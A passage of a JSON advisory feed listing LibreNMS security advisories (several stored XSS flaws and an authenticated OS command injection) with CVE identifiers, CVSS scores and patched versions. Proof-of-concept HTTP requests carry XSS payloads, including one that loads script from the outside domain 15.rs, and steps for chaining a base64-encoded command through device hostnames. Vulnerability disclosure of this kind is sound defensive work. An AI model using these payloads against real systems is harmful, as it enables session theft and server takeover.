Code","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-01-16T17:33:10.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N","references":["https://github.com/librenms/librenms/security/advisories/GHSA-g84x-g96g-rcjc","https://nvd.nist.gov/vuln/detail/CVE-2025-23201","https://github.com/advisories/GHSA-g84x-g96g-rcjc"],"source_kind":"github","identifiers":["GHSA-g84x-g96g-rcjc","CVE-2025-23201"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2025-01-16T18:08:51.798Z","updated_at":"2026-09-03T00:06:37.524Z","epss_percentage":0.00413,"epss_percentile":0.34144,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nODR4LWc5NmctcmNqY84ABDb7","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1nODR4LWc5NmctcmNqY84ABDb7","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"24.11.0","vulnerable_version_range":"\u003c= 24.10.1"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nODR4LWc5NmctcmNqY84ABDb7/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1jNjZwLTY0Zmotam1jMs4ABDb6","url":"https://github.com/advisories/GHSA-c66p-64fj-jmc2","title":"LibreNMS Misc Section Stored Cross-site Scripting vulnerability","description":"# StoredXSS-LibreNMS-MiscSection\n\n\n**Description:**\n\n\nStored XSS on the parameter: `ajax_form.php` -\u003e param: state\n\nRequest:\n```http\nPOST /ajax_form.php HTTP/1.1\nHost: \u003cyour_host\u003e\nX-Requested-With: XMLHttpRequest\nX-CSRF-TOKEN: \u003cyour_XSRF_token\u003e\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: \u003cyour_cookie\u003e\n\ntype=override-config\u0026device_id=1\u0026attrib=override_icmp_disable\u0026state=\"\u003e\u003cimg%20src%20onerror=\"alert(1)\"\u003e \n```\n\n\nof Librenms version 24.10.1 ([https://github.com/librenms/librenms](https://github.com/librenms/librenms)) allows remote attackers to inject malicious scripts. When a user views or interacts with the page displaying the data, the malicious script executes immediately, leading to potential unauthorized actions or data exposure.\n\n\nThe vulnerability in the line:\n```php\n$attrib_val = get_dev_attrib($device, $name);\n```\nwithin the `dynamic_override_config` function arises because the value of `$attrib_val is` retrieved from untrusted data without any sanitization or encoding (at [Line 778](https://github.com/librenms/librenms/blob/master/includes/html/functions.inc.php#L778)). \n\nWhen `dynamic_override_config` is called, the unescaped `$attrib_val` is injected directly into the HTML (at [misc.inc.php](https://github.com/librenms/librenms/blob/master/includes/html/pages/device/edit/misc.inc.php)).\n\n\n**Proof of Concept:**\n1. Add a new device through the LibreNMS interface.\n2. Edit the newly created device and select the Misc section.\n3. In any of the following fields: \"Override default ssh port\", \"Override default telnet port\", \"Override default http port\" or \"Unix agent port\", enter the payload: `\"\u003e\u003cimg src onerror=\"alert(document.cookie)\"\u003e`.\n4. Save the changes.\n5. Observe that when the page loads, the XSS payload executes, triggering a popup that displays the current cookies.\n\n\n\n![image](https://github.com/user-attachments/assets/097d17cb-7a6c-4924-add8-f867df643025)\n![image](https://github.com/user-attachments/assets/8213d55a-d87a-4a6e-94bf-092877398da5)\n\n\n**Impact:**\n\nExecution of Malicious Code","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-01-16T17:32:55.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.6,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N","references":["https://github.com/librenms/librenms/security/advisories/GHSA-c66p-64fj-jmc2","https://github.com/librenms/librenms/pull/16722","https://github.com/librenms/librenms/commit/26258a2518dbfa55b213ec4b90ec16ed97efb597","https://nvd.nist.gov/vuln/detail/CVE-2025-23200","https://github.com/advisories/GHSA-c66p-64fj-jmc2"],"source_kind":"github","identifiers":["GHSA-c66p-64fj-jmc2","CVE-2025-23200"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2025-01-16T18:08:52.689Z","updated_at":"2026-09-03T00:06:37.524Z","epss_percentage":0.30854,"epss_percentile":0.98017,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jNjZwLTY0Zmotam1jMs4ABDb6","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1jNjZwLTY0Zmotam1jMs4ABDb6","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"24.11.0","vulnerable_version_range":"\u003e= 23.9.0, \u003c 24.10.1"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jNjZwLTY0Zmotam1jMs4ABDb6/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0yN3ZmLTNnNGYtNmpwN84ABDb5","url":"https://github.com/advisories/GHSA-27vf-3g4f-6jp7","title":"LibreNMS Ports Stored Cross-site Scripting vulnerability","description":"# StoredXSS-LibreNMS-Ports\n\n\n**Description:**\n\n\nStored XSS on the parameter:\n`/ajax_form.php` -\u003e param: descr\n\nRequest:\n```http\nPOST /ajax_form.php HTTP/1.1\nHost: \u003cyour_host\u003e\nX-Requested-With: XMLHttpRequest\nX-CSRF-TOKEN: \u003cyour_XSRF_token\u003e\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: \u003cyour_cookie\u003e\n\ntype=update-ifalias\u0026descr=%22%3E%3Cimg+src+onerror%3D%22alert(1)%22%3E\u0026ifName=lo\u0026port_id=1\u0026device_id=1\n```\n\n\nof Librenms version 24.10.1 ([https://github.com/librenms/librenms](https://github.com/librenms/librenms)) allows remote attackers to inject malicious scripts. When a user views or interacts with the page displaying the data, the malicious script executes immediately, leading to potential unauthorized actions or data exposure.\n\n\n\n**Proof of Concept:**\n1. Add a new device through the LibreNMS interface.\n2. Edit the newly created device and select the \"ports\" section.\n3. In the \"Description\" field, enter the following payload: `\"\u003e\u003cimg src onerror=\"alert(1)\"\u003e`.\n4. Save the changes.\n5. The XSS vulnerability is triggered when accessing the \"ports\" tab, and the payload is executed again when hovering over the modified value in the \"Port\" field.\n\nPayload:\n![payload](https://github.com/user-attachments/assets/2f38b985-6684-403f-9d1f-e405f09a75bb)\n\nExecutes:\n![image](https://github.com/user-attachments/assets/b70a6e34-d52c-4113-b769-4e271e33de88)\nThe script execution vulnerability in the description field, as shown in the image, occurs at [Line 63 of functions.inc.php](https://github.com/librenms/librenms/blob/master/includes/html/functions.inc.php#L63)\n```php\n$overlib_content = '\u003cdiv class=overlib\u003e\u003cspan class=overlib-text\u003e' . $text . '\u003c/span\u003e\u003cbr /\u003e';\n```\n\n![image](https://github.com/user-attachments/assets/97b85403-5b7e-4f43-932c-d33bd3c0f73f)\n\n\n\n\n**Impact:**\n\nExecution of Malicious Code","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-01-16T17:32:30.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.6,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N","references":["https://github.com/librenms/librenms/security/advisories/GHSA-27vf-3g4f-6jp7","https://github.com/librenms/librenms/pull/16721","https://github.com/librenms/librenms/commit/9d07d166b87634091dcf21c62b28f9b42a3118c4","https://nvd.nist.gov/vuln/detail/CVE-2025-23199","https://github.com/advisories/GHSA-27vf-3g4f-6jp7"],"source_kind":"github","identifiers":["GHSA-27vf-3g4f-6jp7","CVE-2025-23199"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2025-01-16T18:08:52.717Z","updated_at":"2026-09-03T00:06:37.525Z","epss_percentage":0.01267,"epss_percentile":0.67684,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yN3ZmLTNnNGYtNmpwN84ABDb5","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0yN3ZmLTNnNGYtNmpwN84ABDb5","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"24.11.0","vulnerable_version_range":"\u003c 24.10.1"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yN3ZmLTNnNGYtNmpwN84ABDb5/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1wbThqLTN2NjQtOTJjcc4ABDb4","url":"https://github.com/advisories/GHSA-pm8j-3v64-92cq","title":"LibreNMS Display Name Stored Cross-site Scripting vulnerability","description":"**Description:**\n\n\nXSS on the parameters (Replace $DEVICE_ID with your specific $DEVICE_ID value):`/device/$DEVICE_ID/edit` -\u003e param: display\n\n\nof Librenms versions 24.9.0, 24.10.0, and 24.10.1 ([https://github.com/librenms/librenms](https://github.com/librenms/librenms)) allows remote attackers to inject malicious scripts. When a user views or interacts with the page displaying the data, the malicious script executes immediately, leading to potential unauthorized actions or data exposure.\n\n\n**Proof of Concept:**\n1. Add a new device through the LibreNMS interface.\n2. Edit the newly created device by going to the \"Device Settings\" section.\n3. In the \"Display Name\" field, enter the following payload: `\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e`.\n![Screenshot from 2024-11-06 09-41-37](https://github.com/user-attachments/assets/6b44e049-5748-4f70-a667-c681cacec9da)\n\n4. Save the changes.\n5. The XSS payload triggers when accessing the \"/apps\" path (if an application was previously added).\n![Screenshot from 2024-11-06 09-42-05](https://github.com/user-attachments/assets/4bd39e1e-6c60-4cc5-b922-8db7fc8094fc)\n \n**Additional PoC:**\n1. In the \"Display Name\" field, enter the following payload: `\"\u003e\u003cimg src onerror=\"alert(1)\"\u003e`.\n![image](https://github.com/user-attachments/assets/addb1b00-23b1-4c26-8ac7-494cb24ebe8a)\n\n2. The XSS vulnerability is triggered when accessing the \"/ports\" path, and the payload executes when hovering over the modified value in the \"Port\" field.\n![image](https://github.com/user-attachments/assets/446e0d62-2016-4435-a1eb-fe85079498e4)\n-  on `/device/$DEVICE_ID/ports/arp` path:\n![image](https://github.com/user-attachments/assets/72a42b6d-bef0-46d4-a210-5d4888dd5c89)\n\n- on `/device/$DEVICE_ID/logs` path:\n![image](https://github.com/user-attachments/assets/b1322946-7b84-4190-8f77-9854f5b5925c)\n\n- on `/search/search=arp/` path:\n![image](https://github.com/user-attachments/assets/103297b0-5364-4d12-b519-d74777367a2a)\n\n**Impact:**\n\nExecution of Malicious Code","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-01-16T17:21:20.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.6,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N","references":["https://github.com/librenms/librenms/security/advisories/GHSA-pm8j-3v64-92cq","https://github.com/librenms/librenms/commit/afe92dbf4321f107012690d476685603d1ccb013","https://nvd.nist.gov/vuln/detail/CVE-2025-23198","https://github.com/advisories/GHSA-pm8j-3v64-92cq"],"source_kind":"github","identifiers":["GHSA-pm8j-3v64-92cq","CVE-2025-23198"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2025-01-16T18:08:52.741Z","updated_at":"2026-09-03T00:06:37.525Z","epss_percentage":0.00362,"epss_percentile":0.29471,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wbThqLTN2NjQtOTJjcc4ABDb4","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1wbThqLTN2NjQtOTJjcc4ABDb4","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"24.11.0","vulnerable_version_range":"\u003e= 24.9.0, \u003c 24.10.1"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wbThqLTN2NjQtOTJjcc4ABDb4/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0yZjR3LTZtYzctNHc3OM4ABDb2","url":"https://github.com/advisories/GHSA-2f4w-6mc7-4w78","title":"LibreNMS Display Name 2 Stored Cross-site Scripting vulnerability","description":"# StoredXSS-LibreNMS-Display Name 2\n\n\n**Description:**\n\n\nXSS on the parameters (Replace $DEVICE_ID with your specific $DEVICE_ID value):`/device/$DEVICE_ID/edit` -\u003e param: display\n\n\nof Librenms versions 24.11.0 ([https://github.com/librenms/librenms](https://github.com/librenms/librenms)) allows remote attackers to inject malicious scripts. When a user views or interacts with the page displaying the data, the malicious script executes immediately, leading to potential unauthorized actions or data exposure.\n\n\n\n**Proof of Concept:**\n1. Add a new device through the LibreNMS interface.\n2. Edit the newly created device by going to the \"Device Settings\" section.\n3. In the \"Display Name\" field, enter the following payload: `\"\u003e\u003cimg src onerror=\"alert(document.cookie)\"\u003e`.\n![image](https://github.com/user-attachments/assets/b1664e15-eba8-4cdd-b730-fb18936f109c)\n4. Save the changes.\n5. The XSS payload is triggered when navigating to the path /device/$DEVICE_ID/logs and hovering over a type containing a tag (such as Core 1 in the image).\n![image](https://github.com/user-attachments/assets/df23cec8-94bb-4155-961b-52ea659654a2)\n\n\n\n**Impact:**\n\nExecution of Malicious Code","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-01-16T17:18:32.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.6,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N","references":["https://github.com/librenms/librenms/security/advisories/GHSA-2f4w-6mc7-4w78","https://github.com/librenms/librenms/pull/16886","https://github.com/librenms/librenms/commit/c63c912d86098bcefd52a28328482b94632eadf8","https://nvd.nist.gov/vuln/detail/CVE-2024-56144","https://github.com/advisories/GHSA-2f4w-6mc7-4w78"],"source_kind":"github","identifiers":["GHSA-2f4w-6mc7-4w78","CVE-2024-56144"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2025-01-16T18:08:56.038Z","updated_at":"2026-09-03T00:06:37.527Z","epss_percentage":0.00386,"epss_percentile":0.31599,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yZjR3LTZtYzctNHc3OM4ABDb2","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0yZjR3LTZtYzctNHc3OM4ABDb2","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"24.12.0","vulnerable_version_range":"= 24.11.10"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yZjR3LTZtYzctNHc3OM4ABDb2/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS02YzVxLWZnM2ctcWhods4ABCFu","url":"https://github.com/advisories/GHSA-6c5q-fg3g-qhhv","title":"LibreNMS stored cross-site scripting (XSS) vulnerability in the Device Settings section","description":"A stored cross-site scripting (XSS) vulnerability in the Device Settings section of LibreNMS v24.9.0 to v24.10.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Display Name parameter.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2024-12-06T00:31:46.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-53457","https://github.com/tCu0n9/Stored-XSS-LibreNMS-Display-Name.git","https://github.com/librenms/librenms/commit/afe92dbf4321f107012690d476685603d1ccb013","https://github.com/advisories/GHSA-6c5q-fg3g-qhhv"],"source_kind":"github","identifiers":["GHSA-6c5q-fg3g-qhhv","CVE-2024-53457"],"repository_url":"https://github.com/tCu0n9/Stored-XSS-LibreNMS-Display-Name","blast_radius":0.0,"created_at":"2024-12-10T23:07:40.954Z","updated_at":"2026-09-03T00:06:43.508Z","epss_percentage":0.43686,"epss_percentile":0.98681,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02YzVxLWZnM2ctcWhods4ABCFu","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS02YzVxLWZnM2ctcWhods4ABCFu","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"24.11.0","vulnerable_version_range":"\u003e= 24.9.0, \u003c 24.11.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02YzVxLWZnM2ctcWhods4ABCFu/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS04Zmg0LTk0MnItamYyZ84ABBab","url":"https://github.com/advisories/GHSA-8fh4-942r-jf2g","title":"LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/includes/html/pages/device/services.inc.php","description":"### Summary\nA Stored Cross-Site Scripting (XSS) vulnerability in the \"Services\" tab of the Device page allows authenticated users to inject arbitrary JavaScript through the \"descr\" parameter when adding a service to a device. This vulnerability could result in the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and enabling unauthorized actions.\n\n### Details\nWhen creating a device through the \"edit device -\u003e services\" workflow (example path: \"/device/15/edit/section=services\"), the attacker can inject an XSS payload in the \"descr\" parameter. This payload is reflected in the \"Services\" tab of the device (URL: \"/device/15/services\"). It is important to note that the vulnerability does not exist when creating devices through the normal \"Add Service\" interface (created through the ajax_form.php request with the \"type=create-service\").\n\nThe payload used to exploit this vulnerability is:\n```Descr'\"\u003e\u003cscript/src=//15.rs\u003e\u003c/script\u003e```\n\nNote: The payload uses the \"15.rs\" domain to bypass some of the length restrictions found during research by pointing to a malicious remote file. The file contains a POC XSS payload, and can contain any arbitrary JS code.\n\nThe root cause is the application's failure to sanitize the \"descr\" parameter before outputting it in the HTML. The sink is as follows:\nhttps://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/includes/html/pages/device/services.inc.php#L87\n\n### PoC\n1. Create a service for a device using the following payload in the \"descr\" parameter:\n```Descr'\"\u003e\u003cscript/src=//15.rs\u003e\u003c/script\u003e```\n2. Save the service.\n3. Navigate to the \"Services\" tab of the device.\n4. Observe that the injected script executes in the \"Services\" tab.\n\nExample Request:\n```http\nPOST /device/15/edit/section=services HTTP/1.1\nHost: \u003cyour_host\u003e\nContent-Type: application/x-www-form-urlencoded\nCookie: \u003cyour_cookie\u003e\n\n_token=\u003cyour_token\u003e\u0026name=Name'\"\u003e\u003cscript/src=//15.rs\u003e\u003c/script\u003e\u0026addsrv=yes\u0026device=15\u0026type=pollen\u0026descr=Descr'\"\u003e\u003cscript/src=//15.rs\u003e\u003c/script\u003e\u0026ip=IP'\"\u003e\u003cscript/src=//15.rs\u003e\u003c/script\u003e\u0026params=Params'\"\u003e\u003cscript/src=//15.rs\u003e\u003c/script\u003e\u0026Submit=\n```\n\n### Impact\n\nThis vulnerability allows authenticated users to inject and execute arbitrary JavaScript in the context of other users' sessions when they visit the \"Services\" tab of the device. This could result in the compromise of user accounts and unauthorized actions performed on their behalf.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-11-15T20:48:45.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L","references":["https://github.com/librenms/librenms/security/advisories/GHSA-8fh4-942r-jf2g","https://nvd.nist.gov/vuln/detail/CVE-2024-52526","https://github.com/librenms/librenms/commit/30e522c29bbb1f9b72951025e7049a26c7e1d76e","https://github.com/advisories/GHSA-8fh4-942r-jf2g"],"source_kind":"github","identifiers":["GHSA-8fh4-942r-jf2g","CVE-2024-52526"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2024-11-15T21:07:09.419Z","updated_at":"2026-09-03T00:06:51.048Z","epss_percentage":0.00461,"epss_percentile":0.38408,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04Zmg0LTk0MnItamYyZ84ABBab","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04Zmg0LTk0MnItamYyZ84ABBab","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"24.10.0","vulnerable_version_range":"\u003c= 24.9.1"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04Zmg0LTk0MnItamYyZ84ABBab/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS14NjQ1LTZwZjkteHd4d84ABBZK","url":"https://github.com/advisories/GHSA-x645-6pf9-xwxw","title":"LibreNMS has an Authenticated OS Command Injection","description":"### Summary\nAn authenticated attacker can create dangerous directory names on the system and alter sensitive configuration parameters through the web portal. Those two defects combined then allows to inject arbitrary OS commands inside `shell_exec()` calls, thus achieving arbitrary code execution.\n\n### Details\n#### OS Command Injection\nWe start by inspecting the file `app/Http/Controllers/AboutController.php`, more particularly the index() method which is executed upon simply visiting the /about page:\n```php\npublic function index(Request $request)\n    {\n        $version = Version::get();\n\n        return view('about.index', [\n            \u003cTRUNCATED\u003e\n\n            'version_webserver' =\u003e $request-\u003eserver('SERVER_SOFTWARE'),\n            'version_rrdtool' =\u003e Rrd::version(),\n            'version_netsnmp' =\u003e str_replace('version: ', '', rtrim(shell_exec(Config::get('snmpget', 'snmpget') . ' -V 2\u003e\u00261'))),\n\n           \u003cTRUNCATED\u003e\n        ]);\n    }\n```\n\nWe can see that the `version_netsnmp` key receives a value direclty dependent of a `shell_exec()` call. The argument to this call reflects a configuration parameter with no sanitization. Should an attacker identify a way to alter this parameter, the server is at risk of being compromised.\n\n#### Configuration parameters poisoning\nWe now focus on the `update()` method of the `SettingsController.php` script. This method is called when the user visits the route `/settings/{key}` via HTTP PUT. The key parameter here is simply the name of the configuration key the user wishes to modify.\n```php\npublic function update(DynamicConfig $config, Request $request, $id)\n{\n    $value = $request-\u003eget('value');\n\n    if (! $config-\u003eisValidSetting($id)) {\n        return $this-\u003ejsonResponse($id, ':id is not a valid setting', null, 400);\n    }\n\n    $current = \\LibreNMS\\Config::get($id);\n    $config_item = $config-\u003eget($id);\n\n    if (! $config_item-\u003echeckValue($value)) {\n        return $this-\u003ejsonResponse($id, $config_item-\u003egetValidationMessage($value), $current, 400);\n    }\n\n    if (\\LibreNMS\\Config::persist($id, $value)) {\n        return $this-\u003ejsonResponse($id, \"Successfully set $id\", $value);\n    }\n\n    return $this-\u003ejsonResponse($id, 'Failed to update :id', $current, 400);\n}\n```\n\nWe can see that some protections are implemented around the configuration parameters by `$config_item-\u003echeckValue($value)`, with a format of data being expected depending on the data type of the variable the user wants to modify.\nSpecifically, the `snmpget` configuration variable expects a valid path to an existing binary on the system.\nTo summarize : if an attacker finds a valid full-path to a system binary, while that full-path also holds shell metacharacters, then those characters would be interpreted by the `shell_exec()` call defined above and allow for arbitrary command execution.\n\n#### Arbitrary directory creation\nWhen creating a new Device through the \"Add Device\" page, the server allows the user to send malformed or impossible hostnames and force the data to be stored, with no sanitization being performed on this field.\n\nIn the file `app/Jobs/PollDevice.php`, the `initRrdDirectory()` method is responsible for creating a directory named after the Device's hostname. We can see the `mkdir()` call inside the try block:\n```php\nprivate function initRrdDirectory(): void\n{\n    $host_rrd = \\Rrd::name($this-\u003edevice-\u003ehostname, '', '');\n    if (Config::get('rrd.enable', true) \u0026\u0026 ! is_dir($host_rrd)) {\n        try {\n            mkdir($host_rrd);\n            Log::info(\"Created directory : $host_rrd\");\n        } catch (\\ErrorException $e) {\n            Eventlog::log(\"Failed to create rrd directory: $host_rrd\", $this-\u003edevice);\n            Log::info($e);\n        }\n    }\n}\n```\n\nThis method is called by `initDevice()`, which is itself called by the `handle()` method (executed when the job starts).\n`\\Rrd::name()` simply concatenates a string following the format `\u003cLIBRENMS_INSTALL_DIR\u003e/rrd/\u003cDEVICE_HOSTNAME\u003e`.\n\n#### Summary\nWith all this, an authenticated attacker can:\n- Create a malicious Device with shell metacharacters inside its hostname\n- Force the creation of directory containing shell metacharacters through the PollDevice job\n- Modify the `snmpget` configuration variable to point to a valid system binary, while also using the directory created in the previous step via a path traversal (i.e: `/path/to/install/dir/rrd/\u003cDEVICE_HOSTNAME\u003e/../../../../../../../bin/ls`)\n- Trigger a code execution via the `shell_exec()` call contained in the `AboutController.php` script\n\n#### \n\n### PoC\nFor proof of concept, we will create a file located at `/tmp/rce-proof` on the server's filesystem.\n\nConsider the following command : `/usr/bin/touch /tmp/rce-proof`, encoded in base64 (`L3Vzci9iaW4vdG91Y2ggL3RtcC9yY2UtcHJvb2Y=`). This encoding is necesary whenever the command contains '/' characters, as this would otherwise generate invalid directory paths.\nCreate a new Device with a name that contains the command you wish to execute enclosed in semi-colons, ending with a '3' character:\n![librenms-1](https://github.com/user-attachments/assets/a242fc1a-f04a-4df9-901e-abcc5f14af14)\n\nBe careful to tick the \"Force Add\" option, otherwise the request will be rejected. Click add:\n![librenms-2](https://github.com/user-attachments/assets/84e0d853-1418-44aa-870b-4259adba27f8)\n\nA directory matching the hostname of the Device will be created whenever a PollDevice job is launched. For the purpose of the demonstration, we will be triggering this manually with artisan:\n![librenms-4](https://github.com/user-attachments/assets/ce4061ef-6cb6-4847-a229-1417091048f5)\n\nWe can confirm that this directory indeed exists on the system:\n![librenms-5](https://github.com/user-attachments/assets/79f912c6-f200-47d2-b950-d46636dc30ef)\n\nWe can now update the `snmpget` parameter value to point to any binary on the system, making sure that the specified path includes the directory that was just created:\n![librenms-13](https://github.com/user-attachments/assets/4b49c2db-c716-41ae-b668-ff6bf3d5d8de)\n\nVisiting the `/about` page will trigger the payload, then we can check that our code was indeed executed:\n![librenms-10](https://github.com/user-attachments/assets/8fcf0838-50b5-47e0-85d5-0892d9909c76)\n\n\n### Impact\nServer takeover","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2024-11-15T15:54:18.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L","references":["https://github.com/librenms/librenms/security/advisories/GHSA-x645-6pf9-xwxw","https://nvd.nist.gov/vuln/detail/CVE-2024-51092","https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb","https://github.com/advisories/GHSA-x645-6pf9-xwxw"],"source_kind":"github","identifiers":["GHSA-x645-6pf9-xwxw","CVE-2024-51092"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2024-11-15T16:07:38.615Z","updated_at":"2026-09-03T00:06:51.050Z","epss_percentage":0.07176,"epss_percentile":0.93638,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14NjQ1LTZwZjkteHd4d84ABBZK","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14NjQ1LTZwZjkteHd4d84ABBZK","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"24.10.0","vulnerable_version_range":"\u003c= 24.9.1"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14NjQ1LTZwZjkteHd4d84ABBZK/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1ndjRtLWY2ZngtODU5eM4ABBZJ","url":"https://github.com/advisories/GHSA-gv4m-f6fx-859x","title":"LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/includes/html/print-customoid.php","description":"### Summary\nA Stored Cross-Site Scripting (XSS) vulnerability in the \"Custom OID\" tab of a device allows authenticated users to inject arbitrary JavaScript through the \"unit\" parameter when creating a new OID. This vulnerability can lead to the execution of malicious code in the context of other users' sessions, compromising their accounts and enabling unauthorized actions.\n\n### Details\nWhen creating a new OID for a device, an attacker can inject an XSS payload into the \"unit\" parameter. This payload is reflected in the \"Unit\" column of the table displayed in the \"Custom OID\" tab of the device.\n\nThe payload used to exploit this vulnerability is:\n```\u003cscript/src=//15.rs\u003e```\n\nNote: The payload uses the \"15.rs\" domain to bypass some of the length restrictions found during research by pointing to a malicious remote file. The file contains a POC XSS payload, and can contain any arbitrary JS code.\n\nThe vulnerability is due to improper sanitization of the \"unit\" parameter before rendering it in the HTML output. The sink is as follows:\nhttps://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/includes/html/print-customoid.php#L90\n\n### PoC\n1. Create a new OID for a device using the following payload in the \"unit\" parameter:\n```\u003cscript/src=//15.rs\u003e```\n2. Save the OID.\n3. Navigate to the \"Custom OID\" tab of the device.\n4. Observe that the injected script executes in the \"Unit\" column of the table.\n\nExample Request:\n```http\nPOST /ajax_form.php HTTP/1.1\nHost: \u003cyour_host\u003e\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-CSRF-TOKEN: \u003cyour_token\u003e\nX-Requested-With: XMLHttpRequest\nCookie: \u003cyour_cookie\u003e\n\ndevice_id=15\u0026device_name=test4'\u0026ccustomoid_id=2\u0026type=customoid\u0026action=save\u0026name=test1\u003cscript\u003e{onerror=alert}throw+'OID'\u003c/script\u003e\u0026oid=test2\u003cscript\u003e{onerror=alert}throw+'OID'\u003c/script\u003e\u0026unit=\u003cscript/src=//15.rs\u003e\u0026divisor=1\u0026multiplier=1\u0026user_func=test4\u003cscript\u003e{onerror=alert}throw+'OID'\u003c/script\u003e\u0026limit=0\u0026limit_low=0\u0026limit_warn=0\u0026limit_low_warn=0\u0026passed=on\n```\n\n### 